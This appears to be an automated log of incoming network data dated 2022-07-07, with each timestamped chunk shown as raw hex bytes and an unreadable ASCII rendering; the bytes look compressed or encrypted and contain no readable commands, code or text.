                                                                                                                                                            2022-07-07 07:51:12 UTC3930INData Raw: 74 e7 32 aa ef 1f d8 9b eb 3d 32 f4 a2 67 38 ee 1a db ba 9d 17 76 ef 0b 14 ff 41 5f e2 d0 fa 87 f5 ba 6c 9e 4c 20 c8 5d e4 ab 36 b3 e1 6e 17 f1 2b 6a 33 92 a0 0f 11 62 15 28 0e 9e 90 09 33 d6 54 eb ba 5e 92 40 c0 01 f7 f3 91 ec 06 c2 78 ab 47 fe 59 64 b0 0e 33 01 42 e7 d5 77 79 37 1b c2 f8 42 91 b1 0b ff 40 c6 8d 34 a9 25 42 ef 6c c5 3e 4d 6a 31 f0 c6 0a 93 64 76 21 1f d0 47 2c c5 ca 71 42 68 41 b1 40 b1 01 6e cb e4 e8 1d 5c 7b 1c d4 c1 33 13 90 77 52 00 43 4e e1 35 70 96 83 6c 87 9e ab 6e d1 b4 a0 c7 49 6b b2 57 a4 df 94 8c 2f b6 77 c0 b6 6b d3 19 5e 5f 30 ad 25 92 5a 46 63 59 e5 82 e4 30 12 cd eb 9a bc 49 1d 32 d6 7e c4 5b 3e 52 cd b2 e0 f2 d6 7f cc 65 f5 56 22 75 69 78 09 0b 9f 7f 81 84 d7 d1 1d e8 e9 7f 9a ee ff 6e 32 b7 7b 9c e3 e2 bd 65 5f e5 73 ac
                                                                                                                                                            Data Ascii: t2=2g8vA_lL ]6n+j3b(3T^@xGYd3Bwy7B@4%Bl>Mj1dv!G,qBhA@n\{3wRCN5plnIkW/wk^_0%ZFcY0I2~[>ReV"uixn2{e_s
                                                                                                                                                            2022-07-07 07:51:12 UTC3946INData Raw: 56 42 eb 65 8d 24 bd 03 a5 54 52 85 13 09 b6 44 f4 34 41 bf 23 e7 4c a4 d8 4e df ed 45 e4 55 5b a8 7d 37 5c 24 f0 99 f2 31 90 3f 08 f8 8f 7b b8 5e 5e 83 94 14 bb 48 88 23 3f ec f6 8e 56 9f 28 2d 0c 12 3b 2a f9 f0 d8 a8 04 7d e2 d3 39 31 a7 e8 0d ca d7 db 27 f0 64 79 65 ee 50 1a d4 1c 05 10 d7 ec f0 86 b3 56 7b 79 2a 0e 75 20 b9 f0 4c 70 4f e3 dd 64 b8 11 71 08 f2 a6 84 91 51 17 e8 c8 ac 74 c7 87 a0 50 dc 36 1f 6c 99 93 52 eb 80 36 81 a7 9b d6 ef f9 3d 08 18 43 99 af e0 f2 f7 82 f1 ee 0d 39 d5 61 84 9a 91 ed 1f 1b 28 89 fa 5c 1b 6f bb 81 b1 ce 52 ed 55 7b b5 2a d7 48 07 9c 65 f8 a9 72 b8 a8 9b 22 13 e3 89 99 8a 2d 80 5b 28 a7 92 37 75 79 84 88 1b fb eb d9 65 bc 89 f7 47 64 86 0c 52 19 01 7b f9 6a fe 76 b8 af 75 e6 91 80 e4 ac bf 75 17 45 4f b5 8e 49 b0 0d
                                                                                                                                                            Data Ascii: VBe$TRD4A#LNEU[}7\$1?{^^H#?V(-;*}91'dyePV{y*u LpOdqQtP6lR6=C9a(\oRU{*Her"-[(7uyeGdR{jvuuEOI
                                                                                                                                                            2022-07-07 07:51:12 UTC3962INData Raw: 7c fe 78 d8 7b 4e 92 6e f9 f5 8e 86 74 48 91 da 01 a7 b8 1a ed 73 bb ce 2e 7e e2 72 3f f2 57 7f e7 19 67 56 ad 5f 8c e9 4e 57 0d f0 93 31 5f be 6d a3 0d 99 c0 83 35 23 15 f8 7f a8 63 be 0a 65 30 7f 9c 1b 96 d7 1f f9 ad ae a9 a8 cb 4a 7c a7 9c 70 c8 e0 e6 c0 28 af 79 0c 67 8c f8 e3 2c 7e 08 a5 b4 34 d7 7d 36 ef 5c cf 52 54 3e 3e 87 29 3e 9d f8 9f e5 c2 e0 31 ac a8 2d a7 8a 0f a8 0f 32 15 75 eb dc 90 7a f3 70 51 17 05 e6 18 05 41 0e 56 36 c6 0f 7b 72 5d 52 ac 54 09 26 ab 01 ff fd 7f 72 86 49 e4 4e a4 e2 d5 bf 39 ff 0b 1f 9e d6 db e7 ab b9 6d 8a c8 1d 7f 00 df a2 51 78 f2 a9 f2 a1 08 db 93 ad f9 76 22 30 09 4f 5b 88 c6 c2 ae 81 3d 9e 06 42 45 f7 29 7a f0 26 78 3a 10 f8 d9 2f 79 2b 6b b7 cd 06 c2 82 eb 89 f7 87 87 7f 26 fc 72 5a 17 2e ee dc 3f 54 30 15 ce ea
                                                                                                                                                            Data Ascii: |x{NntHs.~r?WgV_NW1_m5#ce0J|p(yg,~4}6\RT>>)>1-2uzpQAV6{r]RT&rIN9mQxv"0O[=BE)z&x:/y+k&rZ.?T0
                                                                                                                                                            2022-07-07 07:51:12 UTC3978INData Raw: 24 0d 86 47 dc 5b 08 e5 e0 c7 65 f1 dc a4 db 25 32 ce 33 50 41 62 d8 ab 22 93 44 23 2a ed 96 37 58 c9 ae 33 2d 06 f6 ad 83 b4 53 65 d3 84 e8 7f 07 11 76 b8 cc 8b d1 12 da 89 f6 2d d9 42 e2 68 51 f5 0f f2 39 cb ad 95 3d 2e 9c 5b af f7 3e b8 4c 8a 97 76 f0 fb 1b e4 20 ec df ff 4e 53 bb 6e 4b c4 4e bd 8a 08 85 1e 2e 88 1a 4a 29 88 ab c1 9b 59 e2 d9 c8 2e 97 63 bf 25 cc 84 45 63 a3 bd 2e 3c 00 4c 10 29 2b 3a 52 7e fd 74 73 7c 42 b8 a5 05 ba 2a 38 19 c6 92 87 a5 de 07 ed a3 af 31 de d1 14 36 2f a9 ab 0a cd 30 b1 b4 40 8a f9 c4 96 7a 2f ba ee af e8 f7 18 4f ad 3c 98 f4 3e 90 63 7a 04 6b 2a bc 57 63 91 ad 11 c6 d2 dc d7 59 cc f3 32 c6 76 18 15 2e 2b 28 60 7a d6 c9 a8 25 95 4d 1c f3 6e 6a d1 71 2e fc 1c b3 4d 82 45 d7 b2 03 52 17 5d b3 18 2e 2e 72 de 5c 4b 15 5b
                                                                                                                                                            Data Ascii: $G[e%23PAb"D#*7X3-Sev-BhQ9=.[>Lv NSnKN.J)Y.c%Ec.<L)+:R~ts|B*816/0@z/O<>czk*WcY2v.+(`z%Mnjq.MER]..r\K[
                                                                                                                                                            2022-07-07 07:51:12 UTC3994INData Raw: e8 e3 fd 3c 28 37 66 25 dd a9 78 24 ec c9 17 a1 ab 85 c1 e3 f2 f3 d1 8f 89 24 b6 00 c8 d2 6a 64 8e 50 28 38 65 d9 2c c4 9f 49 69 0b c6 6f 33 db a0 a9 b2 cc 0f 64 31 e4 72 79 36 31 e7 22 5c f2 b8 84 e0 ee 5d 0f aa 62 52 d2 00 86 d7 40 25 fc f0 67 3c 06 9c 22 d8 fd df a3 40 f9 49 8a de 1a 21 7f 15 14 ca 0a 41 23 9a c9 d4 d9 d5 62 d9 dc 54 1d 56 a4 96 be 86 da a1 30 0a 90 1f 4b d5 3a b6 e6 36 a9 de c9 b1 ac ff b6 4f b3 50 aa 09 87 a3 de 07 60 48 98 37 26 f7 14 3c 0f 3a 45 8a 7a 4f f2 10 ee ca 1f 9d b9 3a 6e 3c 62 f9 e8 24 1e e2 42 d1 76 3b 32 97 c6 a3 06 f7 21 26 5c f6 61 e8 e0 3a 05 f3 1b 7c cb b2 34 68 42 8b 58 65 cd 0d 12 fc 7a ad 71 15 1e 69 39 52 b9 1a d9 e9 e2 16 61 85 75 45 80 e3 2d f2 3c 31 ef 4f 38 f5 e8 4e d5 ac 98 96 74 cd 9e d2 60 1b 40 e4 30 17
                                                                                                                                                            Data Ascii: <(7f%x$$jdP(8e,Iio3d1ry61"\]bR@%g<"@I!A#bTV0K:6OP`H7&<:EzO:n<b$Bv;2!&\a:|4hBXezqi9RauE-<1O8Nt`@0
                                                                                                                                                            2022-07-07 07:51:12 UTC4010INData Raw: d9 56 d8 f9 c4 0c 6d 14 e5 20 71 3d b4 0b bd 50 27 c7 aa 68 dc 4b 11 3d c9 d4 07 24 a3 ba d1 cd 60 e3 07 39 57 61 5d ff d4 ad 97 7c 74 23 a7 7a 7a 7c 62 fc d8 43 15 14 dc c2 a2 3e 4f bb 96 fb 8e 0d 16 7e b5 bd 58 10 28 48 3c 90 04 25 3e c5 1a 63 11 c3 ba 77 07 b7 b4 42 12 9f d1 12 6b 1f a2 5f b4 ce 89 f2 68 67 f9 4c e6 23 87 f6 a4 34 55 85 c2 c7 c5 86 75 55 0a 84 8b 45 d9 dd f8 bd 5c 17 f7 a9 e2 c9 2a 52 00 a8 62 36 ab b7 d6 3f 86 67 94 56 47 60 41 db 81 ca 2e 1c ed 06 69 b6 c3 35 6e e1 34 a2 a3 4b aa 0b c0 57 fd 7f e5 b9 39 b9 ac a4 c1 7e 92 54 27 74 df 52 e9 d3 07 b4 29 a9 ff 18 49 ec 5b 3c 2b 6f ac 0b 30 2a 41 50 1f 8a 17 28 00 dd b6 68 97 56 74 a1 5e be ad 33 8e 4d 65 0d 0c 01 b2 15 cd 0a bd df 17 d3 2e aa 50 d1 ea a2 a5 05 36 2d 5b 4c 07 0c a0 31 26
                                                                                                                                                            Data Ascii: Vm q=P'hK=$`9Wa]|t#zz|bC>O~X(H<%>cwBk_hgL#4UuUE\*Rb6?gVG`A.i5n4KW9~T'tR)I[<+o0*AP(hVt^3Me.P6-[L1&
                                                                                                                                                            2022-07-07 07:51:12 UTC4026INData Raw: 4d 52 04 14 72 89 2b 21 fc 20 4e a6 f3 fa 44 9e 9b 4b 54 fd 3d 50 fd dd b5 b5 0f 89 15 a8 85 66 b2 28 a6 ba a9 17 1a f2 90 ba 78 21 16 b8 6e fb df 1e c4 03 60 8b fa 60 1f 55 d5 82 8c f8 b5 12 7d 33 3e 68 93 e6 1b f3 f3 b2 cf f9 51 93 f2 7b e3 49 15 c0 a1 63 59 2d b3 78 45 6b d8 51 0b 40 b4 1d 6a d3 60 f7 6b 15 bd df 24 5c e4 52 d4 1e c9 94 f5 93 71 42 53 bb d5 9d ab 82 5a bd 94 4e ad 85 81 d4 c9 c4 21 56 95 61 64 73 a6 54 1f f0 5f 9a 8c f2 dc 78 87 78 4f 09 bc e2 a7 ab c0 6d 67 f9 77 9b 3d 48 ad bd 18 f8 81 7e 5f 7f 12 0b 82 f4 7f 97 4f 33 b6 53 01 f2 c2 27 24 25 f3 1f 7e 16 67 8d 28 47 1b 4d 53 6e ff ea 27 4d 77 6e 4e b8 45 4a fc 79 4d 0d dc ce 23 2a ba 85 bb 22 17 7f 75 83 d4 9b 94 a3 9b 3b 72 9e 73 97 3a 44 41 ab be 52 13 5b aa 6a c4 33 c6 ab bf 0c ee
                                                                                                                                                            Data Ascii: MRr+! NDKT=Pf(x!n``U}3>hQ{IcY-xEkQ@j`k$\RqBSZN!VadsT_xxOmgw=H~_O3S'$%~g(GMSn'MwnNEJyM#*"u;rs:DAR[j3
                                                                                                                                                            2022-07-07 07:51:12 UTC4042INData Raw: 46 ef 02 e3 30 c1 26 51 f7 18 fd 16 ad 39 ef ce dc 27 93 a6 02 79 a3 e5 c0 45 eb 16 e6 52 53 d8 70 00 36 04 74 f2 fb e1 fe b1 60 b8 3d e9 bf 8c da c9 8b c0 ad 0d 2c f4 1e 0c 20 74 16 ec 36 56 0a 07 94 0e 7d aa 18 90 d1 bb 43 33 70 7f 6c e1 e5 aa 4a 62 8c 62 0f 1a 76 66 d6 29 01 b1 e3 3f ad c1 9c 0b 16 7f 85 cf 40 ec a5 f9 a1 04 8d fb 02 44 de 8b ea 33 29 dd 46 4c 65 bd 21 c3 fc 77 5c b7 11 96 1c 3e d4 b4 1c 88 be f7 8b 5f 9f 33 c4 5d dc c4 48 46 ad a0 21 00 09 17 03 67 97 93 af 1c 00 0c 7d cb 55 65 fb 8a f3 6c 04 95 97 4a 94 f1 1f 2d 57 76 28 9e 32 7e 18 23 36 18 eb b3 c6 96 85 4e f5 d7 82 a2 e2 c9 74 59 b6 83 88 d3 3f 1e 6a 35 59 7a a0 de 06 78 0a 82 fe 95 64 e9 69 8b 68 41 8b 04 9b cb e9 59 42 23 7a 1a 76 79 fb d9 5a 3c d9 ab 54 a6 fe 84 c7 de 29 41 9a
                                                                                                                                                            Data Ascii: F0&Q9'yERSp6t`=, t6V}C3plJbbvf)?@D3)FLe!w\>_3]HF!g}UelJ-Wv(2~#6NtY?j5YzxdihAYB#zvyZ<T)A
                                                                                                                                                            2022-07-07 07:51:12 UTC4058INData Raw: a1 4d 67 7d dc 9a c5 4e 4c 7c cf 59 08 ae 7c 31 11 97 02 94 5b 0a 17 eb 93 98 a5 fb 71 0e f8 f2 3f 9c 96 3f 3c 42 92 64 e1 53 97 c1 2b 23 ae ee 3e 6b 4c d0 f9 9d 65 f2 86 ff cf 8b dc d6 38 a1 2d 01 b5 0a a7 ff 3c 63 18 30 f5 7b c6 22 19 a2 95 70 ce 0e 3f 32 91 ff 6e d7 b1 d2 c5 c0 03 3f 72 50 98 f6 95 cf c9 1e 62 8f f0 91 f0 3e 0f f9 e7 ee 3a 54 a5 90 5d c3 5f 69 ac d6 04 bb 8d 9f 48 9e f8 c2 45 c9 86 c0 d4 72 8d fa 41 e4 0d b5 52 4e 00 09 62 ff d5 40 c1 64 20 b8 d1 97 29 87 65 90 40 68 c6 5c ba d2 c1 2f 2a ba 6e ee 31 aa d9 c3 80 15 a7 51 e0 26 b5 f3 79 86 2c 83 6f 6e 3f da 43 44 20 4d 64 a6 45 00 56 fd b8 e1 78 6e 66 af 43 5c 55 bb 68 54 1d 61 66 d5 69 20 aa 13 73 0b 83 98 70 d1 d1 35 af 04 1f 24 13 03 d1 a8 40 58 5d 87 95 49 fa e6 1b 32 28 11 c5 36 ff
                                                                                                                                                            Data Ascii: Mg}NL|Y|1[q??<BdS+#>kLe8-<c0{"p?2n?rPb>:T]_iHErARNb@d )e@h\/*n1Q&y,on?CD MdEVxnfC\UhTafi sp5$@X]I2(6
                                                                                                                                                            2022-07-07 07:51:12 UTC4074INData Raw: fa 98 09 3b ba d9 d5 da c0 fa be f2 6c f4 70 26 80 e2 b1 e9 8a bf 44 55 e9 3f 31 57 2a 1b bb 2e f4 92 df 8d b1 84 06 e1 9a df 72 f2 10 0a 61 cf bb 2d 54 3f eb 52 30 a7 0a e6 58 83 00 11 91 05 b6 0d f7 8f 43 48 d8 6d 64 8f 5e 4d 9d 10 ce ba fa a3 85 ff 6e bd aa a6 e9 36 29 28 ec 6f cc 50 ac 28 11 a1 82 33 e5 f5 6e ae 43 db 96 7a 6c 59 51 0f 68 c7 f0 c7 de 99 d3 3c cc dd 85 4d 9a c1 c0 f9 98 b9 a1 75 34 af 1e fc 9d 6f 71 cc 30 81 07 14 9f fa 32 42 e9 54 17 99 b0 bd c9 86 a4 45 94 69 e1 01 16 e7 b0 4b 4d 17 d8 8e cc 88 b0 c3 4f 8b 26 4b 98 82 e5 1c 6b 1e 31 6a a9 f6 75 53 dc 28 07 55 aa 1e 5f 87 5c 35 32 ed 03 13 fe 75 f1 b7 75 82 d3 50 85 57 8e b3 95 3c 83 b7 76 45 cd 82 ae e2 06 ad 89 1e ca f9 5c b0 bd e3 36 d3 eb 23 49 94 73 c0 4a 6e af 66 1b 5e f2 7b ab
                                                                                                                                                            Data Ascii: ;lp&DU?1W*.ra-T?R0XCHmd^Mn6)(oP(3nCzlYQh<Mu4oq02BTEiKMO&Kk1juS(U_\52uuPW<vE\6#IsJnf^{
                                                                                                                                                            2022-07-07 07:51:12 UTC4090INData Raw: c7 72 3e 01 37 cf 10 18 f6 d7 f1 06 14 b8 b4 e7 fd ef d2 af 60 89 76 b7 3a db 33 01 ff f7 91 27 27 22 dd 5b a7 60 97 ed e5 9e f3 b3 64 ff 90 7f 35 c3 e7 c7 19 4e 49 38 83 c3 ed d0 b5 f5 4f d4 be bd 4e 9c fb c9 e3 5d 5e 94 62 94 2c 47 27 8b 37 59 a7 4d 9f 8e 54 c7 f7 73 43 cd f1 43 0c 54 18 fb 33 8e ab 9e 40 36 40 76 3b 37 77 c5 ed f8 b7 b9 1f b1 18 a6 07 df 39 fb 42 a2 3b 37 00 d5 7c 29 62 80 f3 4c b6 54 c7 48 fa 81 22 20 e6 97 70 66 99 84 d2 34 ab de 00 47 79 b0 57 c2 67 b2 92 07 f0 24 6e fd a0 fc e5 ae b8 b7 3f d7 27 f2 56 b8 77 45 3a 44 25 6f a5 3b 5f 90 ac 96 1e fe 78 d5 22 ef 66 29 66 c1 57 54 4d 2a 17 da 68 ec b0 e5 c1 e4 dd 47 98 92 16 43 60 d3 eb 4e ec 33 92 b8 e1 25 ec 3c 96 64 54 db bb 85 83 bb ed 21 e6 9b a9 eb 75 39 91 0b 5c 97 82 8b 9c 1c 2a
                                                                                                                                                            Data Ascii: r>7`v:3''"[`d5NI8ON]^b,G'7YMTsCCT3@6@v;7w9B;7|)bLTH" pf4GyWg$n?'VwE:D%o;_x"f)fWTM*hGC`N3%<dT!u9\*
                                                                                                                                                            2022-07-07 07:51:12 UTC4106INData Raw: 3a 44 56 d8 77 93 77 3b 0c 3c cd f9 4b 71 86 2a d8 b5 14 ad 32 4a a1 4d d8 4f fe 12 1c 10 3a 33 fb ce e0 2f f8 1d 0f 74 ab b9 40 53 ef c2 d0 a0 c0 d6 04 8a 5b 0c 31 0e c3 e3 d2 01 42 3a 5c 57 f2 c3 d6 d6 f8 04 eb 75 b3 e8 75 9a 2b 9d 21 8c b9 0a 82 b0 9e 54 41 a7 12 4d ca f5 46 f0 a6 86 6d 20 ac 41 d9 69 92 b1 99 da a3 60 ee 85 9f 00 d8 a4 58 15 fb f5 63 b1 07 77 c2 cd 47 d2 83 ca c2 77 4f 88 7d de 6a 2b 93 8e 45 b2 b4 14 34 b3 e5 de 86 5a ae 2e 54 1d 3f 9e 29 48 6f 19 01 76 74 a3 a1 17 ba 0d 49 7a 7a 70 34 c6 9a 8f 86 e2 6f 49 6e 66 15 9d fe ac 4d 6e 32 0d d0 6c f8 e0 9d a5 c6 b2 f7 f4 e7 89 45 82 2c 6d 0a e3 06 61 ac ee 6e ac fa c5 c2 01 38 82 62 be e5 2e 71 d2 9a 74 d6 86 b6 3e 75 8c c8 8c f5 0b 71 a9 a5 c2 1d 31 37 8c a5 ae a4 f6 d4 22 0a 70 46 0f ed
                                                                                                                                                            Data Ascii: :DVww;<Kq*2JMO:3/t@S[1B:\Wuu+!TAMFm Ai`XcwGwO}j+E4Z.T?)HovtIzzp4oInfMn2lE,man8b.qt>uq17"pF
                                                                                                                                                            2022-07-07 07:51:12 UTC4110INData Raw: 8d 28 89 c6 c0 75 e1 87 08 d4 1f 2d c7 85 d2 c1 ca ed f2 36 7e 9f 25 ea cf d8 33 24 b3 06 bc 66 43 8b d3 3d 12 88 24 84 cf d6 09 5c 2a 35 fd af 64 63 43 77 e9 4f 62 c9 49 74 41 f0 29 bb e6 a1 49 63 0d 65 c0 d1 f7 20 24 37 2a 36 76 7e 25 eb 52 23 6e 8f e8 ed 0b c0 9c 4f 70 c5 cc 2a a2 86 fc 7c b0 c3 91 88 35 1c a0 ea 35 65 20 28 9c 1e 64 74 b8 25 c2 15 1c 1d 0b 94 73 6b 35 cf 38 b5 a6 1d a6 23 af 56 d0 f4 19 db e0 4a e5 ef 9b 37 33 70 04 4f 56 49 d9 3f df a9 5d e6 b0 6c ac 8d 01 66 ff ca 9d 6b eb 4f c8 ed 57 ac 96 7a 63 b5 c9 28 20 dd 69 7d a4 4f 2b 7a 66 0f 21 56 92 c8 4b c9 3c 49 6c a6 d6 2c 10 07 5c 6f ec 1d 06 31 da 42 e2 c5 50 c8 e6 81 4d 8c 96 a8 ce 85 63 89 e7 ec 73 c6 a7 fd 68 ae 0b 2d e5 10 07 d1 4c 96 50 46 5e 1a d2 ea 8f 10 3c 4a 82 f8 dd 68 00
                                                                                                                                                            Data Ascii: (u-6~%3$fC=$\*5dcCwObItA)Ice $7*6v~%R#nOp*|55e (dt%sk58#VJ73pOVI?]lfkOWzc( i}O+zf!VK<Il,\o1BPMcsh-LPF^<Jh
                                                                                                                                                            2022-07-07 07:51:12 UTC4126INData Raw: a2 19 f2 e3 3f 18 7f 10 81 67 7c 2a 77 8a d3 c0 d5 69 18 ab fa 65 db b0 4c 62 35 91 01 e8 5e d8 ab 1e ac d4 d0 12 ea ba e5 64 a3 bc a6 7b ff b1 7c 1d a1 5d fd 90 55 9d 11 36 39 23 18 92 88 03 c5 1c 1f 48 b7 17 b1 cc f4 a2 e8 12 ce 88 8a 1e 58 75 cd 25 61 c1 42 bd 14 40 5b 90 dd 91 d7 b6 0b bb 7f 61 ca ef 63 61 a4 52 38 04 66 d0 fa ea 94 dc 65 74 77 d0 75 71 38 3e ab 69 a0 20 be cd 86 c6 06 ef f0 48 ad 9b 20 16 8c fe 95 d8 5f ea 8f 1c 8e 29 a4 08 82 e7 c3 78 58 62 26 de 3f ae 46 93 9a db 35 8d 17 33 a7 98 b4 85 5a c2 23 cd 3d 4c 05 8b ca b6 2e 42 9a 87 e7 12 41 8e 60 c9 95 38 78 1a 83 64 e1 ba 01 e3 48 f1 97 e5 92 ca 8f 36 3c 64 58 de 5d 1d 36 3c 3a 84 de 4c 37 5a 34 c1 4f 9a 57 e9 7b a4 94 a5 1d 87 92 9b 33 8b d0 9a 78 7c e5 a7 96 2a a8 3f 3f 32 78 84 8f
                                                                                                                                                            Data Ascii: ?g|*wieLb5^d{|]U69#HXu%aB@[acaR8fetwuq8>i H _)xXb&?F53Z#=L.BA`8xdH6<dX]6<:L7Z4OW{3x|*??2x
                                                                                                                                                            2022-07-07 07:51:12 UTC4142INData Raw: d8 d9 51 70 5d 64 19 9d c7 20 4f 04 d7 36 0d 4d b5 32 4d 2a c0 d8 9b a7 61 45 03 05 d3 5f 11 d6 5f ef b0 7b a1 d6 6b 78 87 d2 4a 5c 9f 28 2d e3 2e ea 69 9a 26 33 c8 55 1f be 1b 65 59 02 9f 51 aa a6 b2 48 59 bf 7f ad 95 96 5e c4 cc 79 59 bf 97 cb 98 de df 45 cb 1c 47 e4 e4 ad 7f 6d 35 33 4c b8 a6 7e 79 0c 4c ac 48 0f 3c 02 29 2a a5 d7 db 6c 7d a9 fe 10 68 e2 29 0b a4 e5 a8 12 e4 49 d5 37 92 92 ac c7 90 33 9f be ef 59 87 de 22 47 c2 26 ac 5f 5b b3 ab 85 76 b4 86 ec 13 64 42 69 3e fc 61 3e 80 6e 74 50 f3 a1 e4 ca 68 1b 66 01 ba cf 91 06 11 31 0c 5f a0 a7 54 86 c1 52 48 5b 95 25 dd 0f 3e 2d 6e 04 9e 53 4e ea 02 31 54 2d 66 b4 9f cd 1a 26 04 04 f7 0b 97 70 3f 9a 6c a8 8d 2d 36 90 8c e7 9a 74 bd 6b 37 b6 52 4e 06 7e e9 fe 74 1d 78 f8 c4 61 22 f7 eb f5 4f a7 ef
                                                                                                                                                            Data Ascii: Qp]d O6M2M*aE__{kxJ\(-.i&3UeYQHY^yYEGm53L~yLH<)*l}h)I73Y"G&_[vdBi>a>ntPhf1_TRH[%>-nSN1T-f&p?l-6tk7RN~txa"O
                                                                                                                                                            2022-07-07 07:51:12 UTC4158INData Raw: a1 0a 61 46 c0 e3 0d 3a e6 58 08 f7 34 2f 59 b5 cb 0c 2c 6e c4 79 44 e3 cc 50 1f d9 6c db a6 6c ed 93 ad cd a6 4e 34 a7 8b 84 92 50 ca 74 c3 b8 b5 34 5a 54 6b 70 00 c3 34 f5 10 06 f9 4d 66 fd 62 fd dd 49 78 e8 82 c6 08 be 71 2e d5 1d 44 2e 44 4e da a6 9e ae 1a 2d 4e b2 5d 63 a6 ca b1 0f f0 79 92 20 4d e2 26 b3 7b 19 89 f7 a8 ce b9 9a 21 b9 02 59 f5 7b 8b 5d 90 56 86 b6 7a d2 ae 9a 24 aa 6d 35 62 62 4d aa 59 44 0d 5c c6 b7 f5 5a bd ca fd b7 56 88 69 ba 67 46 a2 0e 78 79 7c b8 55 64 11 3e 2e 56 b0 12 d7 ea 34 11 93 55 d8 6d b9 f8 93 40 1c be 5b aa e6 eb d8 d0 b1 e0 c7 a9 eb b2 de 0e bf 6f bb 27 5d 38 82 58 c3 62 3a 69 b1 3d 55 05 ac c1 d4 fc b9 2d 1e c5 6b cd b9 41 7b af f9 61 43 4b 8a 4f 75 19 db b5 9c 83 8f 0b fa 4d c2 12 e1 45 b3 15 cf e0 22 f6 0b f0 27
                                                                                                                                                            Data Ascii: aF:X4/Y,nyDPllN4Pt4ZTkp4MfbIxq.D.DN-N]cy M&{!Y{]Vz$m5bbMYD\ZVigFxy|Ud>.V4Um@[o']8Xb:i=U-kA{aCKOuME"'
                                                                                                                                                            2022-07-07 07:51:12 UTC4174INData Raw: 6f 56 45 99 64 02 74 90 d1 6e f6 82 68 36 e8 c2 cc 9d c0 31 50 18 98 8d 7a e4 7f b0 a8 b4 10 f6 bb 1d 58 92 88 88 fe ec ff 2f fb 03 89 ef 69 00 94 e5 0c c3 56 bc 42 af 45 a7 aa 85 0f f2 70 ae 36 fd 9a 9f 0b ce 39 40 85 54 ae f5 96 b6 e5 50 5f ff 4c cf d4 68 35 87 ba a3 c1 8d 62 d1 62 e9 30 97 d9 0e 7c c4 b3 97 cf 54 b4 85 33 c1 20 07 7e 6d 8a 5d 5c 3d 2f d4 1b 31 ec c8 b8 e0 15 0b e5 96 af 11 b0 88 7a a4 f6 d7 65 99 30 2b d9 77 8e 60 42 36 7f 16 c7 b6 1e c8 11 df 2f 00 d0 fc 24 01 eb 36 bb 29 44 e1 97 55 1b 6f ec 1e b9 79 55 b9 52 2b 0f 44 d9 70 15 d6 f8 77 36 ba 6a 7b d2 12 30 d2 8b 59 89 31 73 b1 e2 91 cb 77 ef 9d 3f d5 94 10 a1 fe d3 cf 3f ad e8 c7 f9 99 52 02 50 4f 24 03 48 9d 19 90 9b 3f c1 c7 cf 0f 75 2e b2 ce b2 98 d9 79 da e6 7a 52 87 27 26 c7 68
                                                                                                                                                            Data Ascii: oVEdtnh61PzX/iVBEp69@TP_Lh5bb0|T3 ~m]\=/1ze0+w`B6/$6)DUoyUR+Dpw6j{0Y1sw??RPO$H?u.yzR'&h
                                                                                                                                                            2022-07-07 07:51:12 UTC4190INData Raw: c3 46 8e b3 b1 c3 e6 ed 10 10 f2 73 b8 2c 36 fe 0b 38 fb e0 de 27 5b 3f bd 16 c9 9c 13 3d 07 00 13 9e 1b f8 7f e4 e5 0a 82 06 24 34 cb c7 70 9b a8 db ff 7f 13 ea 75 4a cd fe 66 e2 2a c4 79 8f bc e4 4f ab 8c d0 02 b8 d4 a9 67 7b 29 e7 57 e3 dd 2f 9c 42 85 70 aa cb 22 53 f8 bb 0e 71 0f b1 11 fb cb 9a 71 49 76 a0 61 50 1e a1 2f ee 19 ef 4b d7 d0 ad bc df 66 3a 0b 68 78 5e a2 b5 d9 0f 85 16 13 b6 72 27 68 60 19 36 20 3f 7b 39 d4 ae 2f 99 d1 f0 36 82 e6 76 55 4c 1e f3 c4 bc 06 06 ee 59 ae e4 ca af b9 25 58 56 0c 3c 77 9e 5f cf 60 6d 04 c3 98 90 6a 2d 7d 28 83 3d 63 d1 3e eb 5a da d1 c7 ba 94 98 11 b3 7c ee 6f e6 4d c3 7b 21 45 35 d9 8d f8 20 58 04 19 ac 8e b9 a0 a7 0b c5 cc 9b 75 55 d9 f3 79 fd 18 f9 d6 90 e0 5d 01 59 56 d6 10 48 2c 40 37 43 45 8d 39 c1 bc 85
                                                                                                                                                            Data Ascii: Fs,68'[?=$4puJf*yOg{)W/Bp"SqqIvaP/Kf:hx^r'h`6 ?{9/6vULY%XV<w_`mj-}(=c>Z|oM{!E5 XuUy]YVH,@7CE9
                                                                                                                                                            2022-07-07 07:51:12 UTC4206INData Raw: 83 2b 28 13 90 8f 42 98 a6 d2 af 34 a8 c2 11 49 72 b9 ce 9f b8 7a 72 b0 de 8a 99 a8 34 e0 e7 b1 4b cf 7e 81 82 83 04 ad 4f 55 e0 51 9c bc f6 13 2b 11 86 a2 7f 30 15 46 3e 33 81 ae d9 01 64 9f e3 fa 86 63 c1 07 d7 07 1b 15 7c 5e 2c 60 0f e2 47 6c e2 be 5a b2 32 42 97 d0 00 7e f9 1d 57 37 5b 60 ba 4c e8 9b 67 02 c6 f0 61 50 fe 49 7b 0c db 1b 97 14 a3 46 ef fd f8 33 c1 65 25 b7 86 5a 3c 98 f0 9a c8 d8 13 9c 7e db 91 92 a2 b1 9f 9c b5 88 34 2d a0 e4 03 e0 65 06 fb 02 c2 29 da 8b d1 43 7d d9 20 7b 4d dc c3 82 8f 2c 5e 78 0e b1 5b f3 93 dd b4 c3 25 b9 ee bf cb 3c c2 69 2d da 48 aa 46 7e cd cd 05 01 78 93 e7 2b ca f5 28 15 30 f9 70 2b 7d 65 01 79 ba 14 a6 35 25 39 44 77 0c 9f 13 46 fd 8d d8 40 38 04 6b 6f e2 9f fd 3d c4 2e c6 9a ec 52 b0 54 fb 6b 49 47 14 5d e4
                                                                                                                                                            Data Ascii: +(B4Irzr4K~OUQ+0F>3dc|^,`GlZ2B~W7[`LgaPI{F3e%Z<~4-e)C} {M,^x[%<i-HF~x+(0p+}ey5%9DwF@8ko=.RTkIG]
